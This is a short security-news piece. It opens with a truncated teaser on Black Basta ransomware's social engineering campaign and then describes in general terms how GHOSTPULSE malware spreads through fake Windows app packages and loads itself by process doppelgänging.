Black Basta Ransomware: A New Social Engineering Threat
The Black Basta ransomware group has recently launched an aggressive social engineering campaign targeting businesses. Originating from the remnants of the disbanded Conti group, Black…
Hackers are using fake Windows app packages to spread a new type of malware called GHOSTPULSE. The fake packages are for popular software like Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.
The hackers are cleverly tricking people into downloading the fake Windows app packages through several methods, such as compromised websites, fake search results, and malicious ads. When someone clicks on the fake package, a Windows prompt asks them to click the “Install” button. If they do, a hidden script will download the GHOSTPULSE malware onto their computer from a remote server via a PowerShell script.
GHOSTPULSE is a type of malware that helps facilitate other malware to start running on a system. It does this by using process doppelgänging, which creates a fake copy of a legitimate Windows process and loads the malware into that process.